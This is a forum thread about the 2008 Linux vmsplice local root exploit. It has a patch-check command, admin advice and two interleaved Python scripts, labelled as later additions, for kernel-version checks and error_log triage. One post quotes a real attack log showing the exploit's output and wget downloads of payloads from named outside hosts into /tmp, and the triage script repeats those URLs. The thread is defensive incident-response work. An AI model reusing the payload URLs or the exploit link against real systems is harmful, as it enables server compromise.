Linux vmsplice()Root Exploit

andyreed

On Saturday February 10th, 2008, a new public exploit was released that utilized a similar flaw in vmsplice (vmsplice_to_pipe function) which allows a local user to gain root privileges. This exploit affects Linux kernels v2.6.17 and higher.

vmsplice exploit code is available at: http://www.securityfocus.com/bid/27704/exploit

Once an attacker runs the code and gains root privileges, he/she will then be able to read and write to arbitrary memory locations on affected servers.

How can I discover if my system is vulnerable:
SSH to the server and run the following command:
/bin/grep -ri vmsplice /boot/System.map-$(uname -r)
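A word on that grep, with an added example that is not part of the thread: the command only tells you that sys_vmsplice is compiled into the running kernel, and a fixed kernel exports exactly the same symbol (a later reply in this thread runs into this). The check a sysadmin actually wants is whether the running `uname -r` is at or above the fixed version named in the distro's advisory, and whether a newer kernel has been installed but not booted. The script below does both; the fixed version is a placeholder you pass on the command line, because vendor kernels backport fixes under their own release numbers and an upstream version cannot be compared with, say, an el5 kernel. The `rpm -q kernel --queryformat` call is only for RPM-based systems such as the CentOS/Fedora asked about above.

```python
"""Kernel-side check for the vmsplice fix.

Added example, not from the thread. The grep in the post only shows that
sys_vmsplice is present; a fixed kernel still exports the symbol, so it is
not a vulnerability test. What matters is whether the running kernel
version carries the fix and whether a newer, installed kernel is waiting
for a reboot.
"""
import re
import subprocess
import sys

_VER_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?(?:-([\d.]+))?")


def parse_kernel_version(text):
    """Turn '2.6.18-53.1.14.el5' into (2, 6, 18, 0, 53, 1, 14) so versions
    within one branch compare as tuples. Vendor tags such as 'el5' are
    dropped; a missing sublevel or release counts as 0."""
    m = _VER_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised kernel version: %r" % text)
    major, minor, patch, sub, rel = m.groups()
    parts = [int(major), int(minor), int(patch), int(sub or 0)]
    if rel:
        parts += [int(x) for x in rel.strip(".").split(".") if x]
    return tuple(parts)


def symbol_in_map(map_lines):
    """What the thread's grep does: report whether sys_vmsplice appears in
    System.map. True on both vulnerable and fixed kernels."""
    return any(line.split()[-1] == "sys_vmsplice"
               for line in map_lines if line.split())


def vmsplice_status(running, fixed, installed=()):
    """Classify `running` (uname -r) against `fixed`, the first fixed kernel
    version from your distro's advisory (a placeholder here).

    Returns 'patched', 'vulnerable', 'reboot-needed' (a fixed kernel is
    installed but not the one booted) or 'unknown' (different branch, so the
    two numbers are not comparable)."""
    r, f = parse_kernel_version(running), parse_kernel_version(fixed)
    if r[:3] != f[:3]:
        return "unknown"
    if r >= f:
        return "patched"
    for candidate in installed:
        c = parse_kernel_version(candidate)
        if c[:3] == f[:3] and c >= f:
            return "reboot-needed"
    return "vulnerable"


def installed_rpm_kernels():
    """Installed kernel packages on an RPM-based system; empty list where
    rpm is unavailable."""
    try:
        out = subprocess.check_output(
            ["rpm", "-q", "kernel", "--queryformat", "%{VERSION}-%{RELEASE}\n"])
    except (OSError, subprocess.CalledProcessError):
        return []
    return out.decode().split()


if __name__ == "__main__":
    if len(sys.argv) != 2:
        # The fixed version is a placeholder: take it from your distro's
        # vmsplice advisory, not from this script.
        sys.exit("usage: %s <first-fixed-kernel-version-from-advisory>" % sys.argv[0])
    fixed_version = sys.argv[1]
    running = subprocess.check_output(["uname", "-r"]).decode().strip()
    try:
        with open("/boot/System.map-" + running) as fh:
            print("sys_vmsplice in System.map:", symbol_in_map(fh))
    except OSError as exc:
        print("System.map not readable:", exc)
    print("running:", running, "->",
          vmsplice_status(running, fixed_version, installed_rpm_kernels()))
```

The 'unknown' result is deliberate: comparing an el5 2.6.18 kernel against an upstream 2.6.24 number says nothing, so the script refuses to guess rather than reporting a vendor kernel as vulnerable.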

 
Somebody know how to patch kernel without recompiling? centos, fedora
 
Just distros have updated their kernels by now. I suggest you all attempt to update your kernels via your upstream distro update channels.

Also note this is a local root exploit... and not one you'll see from remote attack vectors.

It is recommended that you do patch it... as it's possible a rogue webscript could use it to gain root access.
 
Many systems are configured to update but not install kernels.

And remember you do have to restart your server to switch to the new kernel.

Jeff
 
I have just come across this exploit only by losing root access, which could have been done with this exploit, and have installed the newest kernel and have rebooted, but yet the c0491353 T sys_vmsplice line is still coming up, just a different number. Any ideas?
 
c0491353 T sys_vmsplice is what I get with /bin/grep -ri vmsplice /boot/System.map-$(uname -r) and my kernel is 2.6.18-53.1.14.el5. Hope this helps.
 
I'm sure I was had off by this exploit at some point; they erased all my server and used it for DDoS :(

Now I'm secure.

Install the Nessus security scanner on your own PC and scan your server to see how secure you are!
 
Install the Nessus security scanner on your own PC and scan your server to see how secure you are!

Yeah, because security scanners will tell you anything. Just saying, solely relying on those is a bad practice.
 
Nessus has been proven to be the best one that has the least false positives and has worked to track down problems for me in the past.

I read it in a PC mag and out of all the ones they've tried it was the best in the labs to show possible ways to exploit the machines.
 
But this doesn't help me to fix the exploit, which was fixed in the previous version of the kernel to the one I'm currently using, and you would think they would keep the fix in the newer kernel, else it would mean people would have to downgrade their kernel, and if this was the case why release a kernel without the fix?
 
I had an attack attempt. Happily I have a kernel with the grsec patch.
The program started up from /tmp, which was without noexec because I was updating software :)
Below are the execution log and apache error_log:
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e74000 .. 0xb7ea6000
[-] vmsplice: Bad address


[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:20:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 02:22:46 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:29:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:31:20 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:40:58 2009] [error] [client 212.227.48.57] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Sun Feb 15 04:37:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 04:39:00 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:45:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 05:47:15 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:54:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 06:56:18 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
--07:56:26-- http://crossback.de/23.txt
=> `/tmp/23.txt'
Resolving crossback.de... 77.37.17.225
Connecting to crossback.de|77.37.17.225|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,835 (17K) [text/plain]

0K .......... ....... 100% 1.56 MB/s

07:56:26 (1.56 MB/s) - `/tmp/23.txt' saved [17835/17835]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
--07:57:55-- http://naughtyvibez.at/nou
=> `nou'
Resolving naughtyvibez.at... 84.16.255.129
Connecting to naughtyvibez.at|84.16.255.129|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,920 (11K) [text/plain]

0K .......... 100% 1.02 MB/s

07:57:56 (1.02 MB/s) - `nou' saved [10920/10920]

[Sun Feb 15 08:02:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 08:04:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 08:04:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 08:04:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
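What makes the log above useful to a responder is not the w00tw00t lines (a scanner signature that shows up in nearly every public error_log) but the lines that are not Apache entries at all: Apache sends a CGI/PHP child's stderr to error_log, so the exploit's banner and the wget transcript fetching files into /tmp are the record of what ran under the web server user. The script below is an added example, not something from the thread or the poster; it splits an error_log into Apache entries and foreign output, counts scanner noise per client, and pairs each wget URL line with the `=> \`file'` line that follows it. SAMPLE_LOG is a constructed subset of the lines quoted in the post; the regexes for the Apache 2.0/2.2 error format and the wget 1.x transcript are assumptions that match those lines.

```python
"""Triage an Apache error_log that has foreign program output mixed in.

Added example, not from the thread. Apache writes a CGI/PHP process's
stderr into error_log, so the exploit banner and the wget transcript in the
post show what ran under the web server user; the w00tw00t lines are
routine scanner noise. SAMPLE_LOG is a constructed subset of the post.
"""
import re
import sys
from collections import Counter

APACHE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$")
WGET_URL_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(?P<url>\S+)$")  # wget 1.x header line
WGET_SAVE_RE = re.compile(r"=> `(?P<path>[^']+)'")                 # the '=> `file'' line after it

SCANNER_MARKERS = ("w00tw00t",)                        # DFind-style scanner seen in the post
EXPLOIT_MARKERS = ("vmsplice", "Local Root Exploit")   # the exploit announces itself on stderr

SAMPLE_LOG = """\
[Sun Feb 15 01:14:32 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Sun Feb 15 03:53:37 2009] [error] [client 78.47.219.66] Invalid URI in request Connection: Close
[Sun Feb 15 03:53:37 2009] [warn] [client 78.47.219.66] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[-] vmsplice: Bad address
--07:56:26-- http://crossback.de/23.txt
=> `/tmp/23.txt'
HTTP request sent, awaiting response... 200 OK
--07:57:55-- http://naughtyvibez.at/nou
=> `nou'
[Sun Feb 15 08:02:14 2009] [error] [client 86.109.96.163] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
"""


def parse_apache_line(line):
    """Fields of one Apache error entry, or None for a foreign line."""
    m = APACHE_RE.match(line)
    return m.groupdict() if m else None


def triage(lines):
    """Walk the log once and sort its lines into what a responder needs."""
    report = {
        "scanner_hits": Counter(),  # client ip -> scanner-signature requests
        "other_errors": Counter(),  # client ip -> other Apache entries
        "downloads": [],            # (url, saved_path) pairs from wget output
        "exploit_banner": False,    # exploit banner landed in error_log
        "foreign_lines": 0,         # lines that are not Apache entries at all
    }
    pending_url = None
    for raw in lines:
        line = raw.rstrip("\n")
        if not line.strip():
            continue
        rec = parse_apache_line(line)
        if rec:
            bucket = "scanner_hits" if any(mk in rec["msg"] for mk in SCANNER_MARKERS) else "other_errors"
            report[bucket][rec["ip"]] += 1
            continue
        report["foreign_lines"] += 1
        if any(mk in line for mk in EXPLOIT_MARKERS):
            report["exploit_banner"] = True
        m = WGET_URL_RE.match(line)
        if m:
            pending_url = m.group("url")  # remember until the '=>' line pairs it with a path
            continue
        m = WGET_SAVE_RE.search(line)
        if m and pending_url:
            report["downloads"].append((pending_url, m.group("path")))
            pending_url = None
    return report


def verdict(report):
    """Reduce the report to findings, most serious first."""
    findings = []
    if report["exploit_banner"]:
        findings.append("local root exploit banner in error_log: a binary ran under the web server user")
    for url, path in report["downloads"]:
        where = "into /tmp" if path.startswith("/tmp/") else "into the server process's working directory"
        findings.append("wget transcript in error_log: %s fetched %s" % (url, where))
    for ip, n in report["scanner_hits"].most_common():
        findings.append("scanner signature from %s (%d requests): noise, not by itself a compromise" % (ip, n))
    return findings


if __name__ == "__main__":
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for finding in verdict(triage(source)):
        print(finding)
```

Run it against a real error_log path to get the same three categories; the ordering in verdict() is intentional, since a download into /tmp on a box where /tmp is not mounted noexec (the poster's situation) is what you chase first, and the scanner counts go last.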
 